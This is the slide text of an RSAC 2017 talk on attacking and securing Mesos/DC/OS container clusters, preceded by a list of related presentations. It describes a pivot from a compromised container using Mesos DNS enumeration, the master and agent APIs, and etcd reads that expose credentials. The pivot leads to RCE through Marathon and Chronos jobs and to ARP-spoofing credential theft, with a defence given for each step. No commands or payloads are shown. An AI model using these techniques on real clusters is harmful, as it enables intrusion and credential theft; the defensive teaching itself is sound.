Deep Dive: AWS CloudHSM (Classic)Deep Dive: AWS CloudHSM (Classic)
Deep Dive: AWS CloudHSM (Classic)
 
Application Delivery Patterns
Application Delivery PatternsApplication Delivery Patterns
Application Delivery Patterns
 
Serverless Development To Production Pipeline
Serverless Development To Production PipelineServerless Development To Production Pipeline
Serverless Development To Production Pipeline
 
Defending your workloads with aws waf and deep security
Defending your workloads with aws waf and deep securityDefending your workloads with aws waf and deep security
Defending your workloads with aws waf and deep security
 
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
 

Similar to Orchestration Ownage - RSAC 2017

Open Source in Security-Critical Environments
Open Source in Security-Critical EnvironmentsOpen Source in Security-Critical Environments
Open Source in Security-Critical Environments
Priyanka Aash
 
Open source-in-security-critical-environments
Open source-in-security-critical-environmentsOpen source-in-security-critical-environments
Open source-in-security-critical-environments
DESMOND YUEN
 
Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”
Priyanka Aash
 
The Trouble with Saas and Hybrid Cloud
The Trouble with Saas and Hybrid CloudThe Trouble with Saas and Hybrid Cloud
The Trouble with Saas and Hybrid Cloud
Novosco
 
Aspirin as a Service: Using the Cloud to Cure Security Headaches
Aspirin as a Service: Using the Cloud to Cure Security HeadachesAspirin as a Service: Using the Cloud to Cure Security Headaches
Aspirin as a Service: Using the Cloud to Cure Security Headaches
Priyanka Aash
 
Top Performance Problems in Distributed Architectures
Top Performance Problems in Distributed ArchitecturesTop Performance Problems in Distributed Architectures
Top Performance Problems in Distributed Architectures
Andreas Grabner
 
Docker FedSummit 2017 - Journey to the Cloud with CaaS
Docker FedSummit 2017 - Journey to the Cloud with CaaSDocker FedSummit 2017 - Journey to the Cloud with CaaS
Docker FedSummit 2017 - Journey to the Cloud with CaaS
Alex Rhea
 
Whose Cloud is It Anyway - Data Security in the Cloud
Whose Cloud is It Anyway - Data Security in the CloudWhose Cloud is It Anyway - Data Security in the Cloud
Whose Cloud is It Anyway - Data Security in the Cloud
SafeNet
 
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
Priyanka Aash
 
Cloud-native .NET Microservices mit Kubernetes
Cloud-native .NET Microservices mit KubernetesCloud-native .NET Microservices mit Kubernetes
Cloud-native .NET Microservices mit Kubernetes
QAware GmbH
 
Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...
Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...
Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...
CA Technologies
 
Take It to the Cloud: The Evolution of Security Architecture
Take It to the Cloud: The Evolution of Security ArchitectureTake It to the Cloud: The Evolution of Security Architecture
Take It to the Cloud: The Evolution of Security Architecture
Priyanka Aash
 
Reactive Microservices Roadshow Berlin
Reactive Microservices Roadshow BerlinReactive Microservices Roadshow Berlin
Reactive Microservices Roadshow Berlin
Christian Deger
 
The Pivot
The PivotThe Pivot
The Pivot
Priyanka Aash
 
agile microservices @scaibo
agile microservices @scaiboagile microservices @scaibo
agile microservices @scaibo
Ciro Donato Caiazzo
 
Data Driven DevOps: from Culture to Gamification
Data Driven DevOps: from Culture to GamificationData Driven DevOps: from Culture to Gamification
Data Driven DevOps: from Culture to Gamification
Brian McCallion
 
Cloud Security Essentials 2.0 at RSA
Cloud Security Essentials 2.0 at RSACloud Security Essentials 2.0 at RSA
Cloud Security Essentials 2.0 at RSA
Shannon Lietz
 
Microservices: Decomposing Applications for Deployability and Scalability (ja...
Microservices: Decomposing Applications for Deployability and Scalability (ja...Microservices: Decomposing Applications for Deployability and Scalability (ja...
Microservices: Decomposing Applications for Deployability and Scalability (ja...
Chris Richardson
 
Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...
Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...
Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...
CA Technologies
 
How to build, manage and operate a successful saas business
How to build, manage and operate a successful saas businessHow to build, manage and operate a successful saas business
How to build, manage and operate a successful saas business
kanimozhin
 

Similar to Orchestration Ownage - RSAC 2017 (20)

Open Source in Security-Critical Environments
Open Source in Security-Critical EnvironmentsOpen Source in Security-Critical Environments
Open Source in Security-Critical Environments
 
Open source-in-security-critical-environments
Open source-in-security-critical-environmentsOpen source-in-security-critical-environments
Open source-in-security-critical-environments
 
Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”
 
The Trouble with Saas and Hybrid Cloud
The Trouble with Saas and Hybrid CloudThe Trouble with Saas and Hybrid Cloud
The Trouble with Saas and Hybrid Cloud
 
Aspirin as a Service: Using the Cloud to Cure Security Headaches
Aspirin as a Service: Using the Cloud to Cure Security HeadachesAspirin as a Service: Using the Cloud to Cure Security Headaches
Aspirin as a Service: Using the Cloud to Cure Security Headaches
 
Top Performance Problems in Distributed Architectures
Top Performance Problems in Distributed ArchitecturesTop Performance Problems in Distributed Architectures
Top Performance Problems in Distributed Architectures
 
Docker FedSummit 2017 - Journey to the Cloud with CaaS
Docker FedSummit 2017 - Journey to the Cloud with CaaSDocker FedSummit 2017 - Journey to the Cloud with CaaS
Docker FedSummit 2017 - Journey to the Cloud with CaaS
 
Whose Cloud is It Anyway - Data Security in the Cloud
Whose Cloud is It Anyway - Data Security in the CloudWhose Cloud is It Anyway - Data Security in the Cloud
Whose Cloud is It Anyway - Data Security in the Cloud
 
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
 
Cloud-native .NET Microservices mit Kubernetes
Cloud-native .NET Microservices mit KubernetesCloud-native .NET Microservices mit Kubernetes
Cloud-native .NET Microservices mit Kubernetes
 
Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...
Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...
Securing Your Enterprise Continuous Delivery Pipelines with CA Automation Sol...
 
Take It to the Cloud: The Evolution of Security Architecture
Take It to the Cloud: The Evolution of Security ArchitectureTake It to the Cloud: The Evolution of Security Architecture
Take It to the Cloud: The Evolution of Security Architecture
 
Reactive Microservices Roadshow Berlin
Reactive Microservices Roadshow BerlinReactive Microservices Roadshow Berlin
Reactive Microservices Roadshow Berlin
 
The Pivot
The PivotThe Pivot
The Pivot
 
agile microservices @scaibo
agile microservices @scaiboagile microservices @scaibo
agile microservices @scaibo
 
Data Driven DevOps: from Culture to Gamification
Data Driven DevOps: from Culture to GamificationData Driven DevOps: from Culture to Gamification
Data Driven DevOps: from Culture to Gamification
 
Cloud Security Essentials 2.0 at RSA
Cloud Security Essentials 2.0 at RSACloud Security Essentials 2.0 at RSA
Cloud Security Essentials 2.0 at RSA
 
Microservices: Decomposing Applications for Deployability and Scalability (ja...
Microservices: Decomposing Applications for Deployability and Scalability (ja...Microservices: Decomposing Applications for Deployability and Scalability (ja...
Microservices: Decomposing Applications for Deployability and Scalability (ja...
 
Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...
Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...
Case Study: Decide. Commit. Succeed. How Beachbody Moved to a Next-Generation...
 
How to build, manage and operate a successful saas business
How to build, manage and operate a successful saas businessHow to build, manage and operate a successful saas business
How to build, manage and operate a successful saas business
 

Recently uploaded

PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 

Recently uploaded (20)

PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 

Orchestration Ownage - RSAC 2017

  • 2. Presenter’s Company Logo – replace or delete on master slide #RSAC Intro 2 Mike Mellor Director, Information Security @ Adobe Bryce Kunz Senior Threat Specialist @ Adobe
  • 3. Presenter’s Company Logo – replace or delete on master slide #RSAC Containers - The Future is Now! 3 2016 Surveys: 15-16% of all organizations are already using containers in production 35% organizations have done a proof-of-concept The Future is Now! Containers are in production now Containers are continuing to grow in popularity
  • 4. Presenter’s Company Logo – replace or delete on master slide #RSAC Containers appear more secure 4 The biggest drivers: 39% to increase developer efficiency and 36% to support microservices Organizations want to avoid cloud platform lock-in 2016 Surveys: Many (42%) organizations gain value in the “secure/isolated” capabilities that containers provide
  • 5. Presenter’s Company Logo – replace or delete on master slide #RSAC But managing Containers feels complex 5 2016 Survey: The more exposure an organization has to containers, The more complexities are exposed. Respondents said they found containers… “too complex to integrate into existing environments,” and require “too many skilled resources to manage.”
  • 6. Presenter’s Company Logo – replace or delete on master slide #RSAC And are very challenging to manage at scale 6 2016 Survey: The #1 challenge of containers, according to the 53% of respondents who are either using or evaluating containers, is … “Container Management.”
  • 7. Presenter’s Company Logo – replace or delete on master slide #RSAC Probable Security Nightmare 7 “Too Complex” + Challenging to Manage = Probable Security Nightmare “Complexity the Worst Enemy of Security” - Bruce Schneier
  • 8. Presenter’s Company Logo – replace or delete on master slide #RSAC Container and Cluster Management Options 8 Technology Design Pros Cons Public Cloud Container Services Container Centric Easy, Scalable Vendor Lock-in; Proprietary Docker Swarm Docker Centric Native Clustering Limited by API Kubernetes Clusters of Containerized Apps Works w/ Docker; Mounts persistent volumes Custom overlay requires more specialization Mesos & DC/OS Cluster Management Works w/ Docker, Kubernetes, & Native Apps; Very Flexible Additional layers adds more complexities
  • 9. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Cluster Management 9 CoreOS Linux OS Many servers in… DataCenter AWS Azure etc… How do we effectively use all of these resources? Datacenter, Azure, AWS, GCE, etc…
  • 10. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Mesos Master & Agents 10 Mesos Master 5050/TCP by default Distributes Tasks Mesos Agent 5051/TCP by default Executes Tasks CoreOS Linux OS Datacenter, Azure, AWS, GCE, etc… Master AgentAgent
  • 11. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Mesos is the Kernel of DC/OS 11 Mesos is the kernel of the distributed operating system known as DC/OS Datacenter, Azure, AWS, GCE, etc… Kernel: Master AgentAgent
  • 12. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Frameworks 12 Frameworks provide the logic Init Jobs — Marathon Cron Jobs Chronos MetronomeDatacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Master AgentAgent
  • 13. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Supporting: Configuration Stores 13 Configuration Stores keep everyone on the same page Zoo Keeper Etcd Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Supporting: Master AgentAgent
  • 14. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Supporting: Discovery 14 Discovery Enables the finding of other services within the cluster Mesos DNS Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Supporting: Master AgentAgent
  • 15. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server DC/OS Design 15 Containers w/ Apps Docker Containers Web Apps etc… Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App
  • 16. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Internet Accessible Containers 16 Containers w/ Apps Public Internet Accessible Private Internal Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet
  • 17. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Scenario 17 Initial Access (RCE) Via a vulnerable web application Into a container As limited user (e.g. www-data) Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 18. Presenter’s Company Logo – replace or delete on master slide #RSAC Scenario: RCE via web app within a container 18 e.g. JBoss, Tomcat, OSGi Console, Axis2, etc…
  • 19. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos DNS 19 Query via pivot: Mesos DNS 53/UDP & TCP — DNS service Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 20. Presenter’s Company Logo – replace or delete on master slide #RSAC .mesos TLD 20 The easy way to find services within the cluster
  • 21. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos DNS 21 Query via pivot: Mesos DNS 8123/TCP by default — DNS via REST API Service Discover — within the Cluster Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 22. Presenter’s Company Logo – replace or delete on master slide #RSAC Undocumented? 22 /v1/enumerate -> all mesos dns information
  • 23. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos DNS using REST API 23 /v1/enumerate -> all mesos dns information
  • 24. Presenter’s Company Logo – replace or delete on master slide #RSAC Find IP & RHP TCP ports of all services 24 /v1/enumerate -> all mesos dns information
  • 25. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Disable Risky Mesos DNS Features 25 Disable the… “AXFR” “Enumerate” API Calls • Harder for attacker to discover all services • Applications shouldn’t commonly be using these API callsDatacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 26. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos Master 26 Query via pivot: Mesos Master 5050/TCP by default Distributes Tasks Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 27. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Master 27 Request via the REST API
  • 28. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Master 28 Response: json w/ all Mesos Agent’s IP addresses within the cluster
  • 29. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos DNS 29 Query via pivot: Mesos Agent 5051/TCP by default Executes Tasks Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 30. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Agent 30 Request via the REST API
  • 31. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Agent 31 Response: json w/ what containers are currently running on the server (i.e. basic0012)
  • 32. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Logical Internal Network Segmentation 32 Separates out the network into zones: Apps w/ Data Management Commonly with Calico, Canal, or FlannelDatacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App
  • 33. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secrets via Configuration Store 33 Etcd RHP/TCP by default — 2379/TCP client/server — 2380/TCP peers Configuration Store — Core OS Fleets Units — Applications ZooKeeper 2181/TCP by default — Binary Protocol Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 34. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Etcd 34 Request via the REST API recursively
  • 35. Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Etcd 35 Response: json frequently containing secrets including credentials
  • 36. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Separate Configuration Stores 36 Separate out the configuration stores into zones: Apps w/ Data Management Enforce separation via… Authentication Credentials and Logical Network Segmentation Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 37. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Frameworks 37 Marathon Long Running Services — e.g. Containers Ensures always running Chronos Cron for the Cluster Batch Jobs Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 38. Presenter’s Company Logo – replace or delete on master slide #RSAC RCE via Marathon Jobs 38 Request via the REST API
  • 39. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server RCE via Marathon Jobs 39 Marathon Long Running Services — e.g. Containers Ensures always running Chronos Cron for the Cluster Batch Jobs Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE RCE
  • 40. Presenter’s Company Logo – replace or delete on master slide #RSAC RCE via Marathon Jobs 40 Response: json with the malicious job status
  • 41. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server RCE via Chronos Jobs 41 Marathon Long Running Services — e.g. Containers Ensures always running Chronos Cron for the Cluster Batch Jobs Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE RCE
  • 42. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Enforce Authentication 42 Applications must… support and be configured to use authentication as well securely store and use credentials be deployed securely and/or retrieve credentials securely Alert on brute force attempts Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 43. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Creds via MitM with ARP Spoofing 43 Another Container has the Creds for Marathon Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
  • 44. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Creds via MitM with ARP Spoofing 44 Attacker uses ARP spoofing to redirect that containers traffic to the compromised container Attacker collect the credentials Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE ARP
  • 45. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Creds via MitM with ARP Spoofing 45 Attacker can now create malicious Marathon jobs Negating authentication security controls Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE ARP RCE
  • 46. Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: TLS for Internal Communications 46 Enable TLS w/ valid certificates for strong HTTPS communications Anything using credentials needs TLS! Validate Certificates Fail closed on bad certificates Alert on certificates errors Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE ARP
  • 47. Presenter’s Company Logo – replace or delete on master slide #RSAC Strategic Actions 47 Next week: Assess which services you can enable Authentication & TLS on — w/o breaking your existing applications within the cluster Three months from now: Implement Authentication & TLS on safe services and frameworks — Focusing on services responsible for orchestration within the cluster Deploy separate services where possible for Apps that do not support TLS & Auth Six months from now: Retrofit all Applications within the cluster to use TLS & Authentication Enforce the use of TLS & Authentication internal everywhere (disable clear-text)
  • 48. Presenter’s Company Logo – replace or delete on master slide #RSAC Big Picture 48 Container Adoption Is Maturing, especially in Enterprises Enterprises are using containers in production.
  • 49. Presenter’s Company Logo – replace or delete on master slide #RSAC Big Picture 49 Pivoting from a compromised service within the cluster No container breakout / 0day / exploit needed J May enable an attacker to completely compromise the cluster
  • 50. Presenter’s Company Logo – replace or delete on master slide #RSAC Big Picture 50 Looking Beyond the Border with a Defense in Depth strategy Secures the Future & the cluster
  • 51. Presenter’s Company Logo – replace or delete on master slide #RSAC Thank you! 51 Thank you!
  • 52. Presenter’s Company Logo – replace or delete on master slide #RSAC Future Research 52 Testing MitM from compromised container NCC Group’s report states this is possible for co-hosted containers Test downgrade HTTPS communications Can we downgrade from HTTPS to HTTP and capture creds from another container? Test Certs (e.g. can cert pinning be enabled?) to REST APIs Can we MitM and impersonate the API service? Test Authentication Brute force attacks Fairly certain there are no lockouts, can we enable better authentication security? — Write module to brute-force and guess creds Test Logical Network Segmentation Tools Calico, Canal, Flannel — Note: these should work as advertised but probably we should independently verify
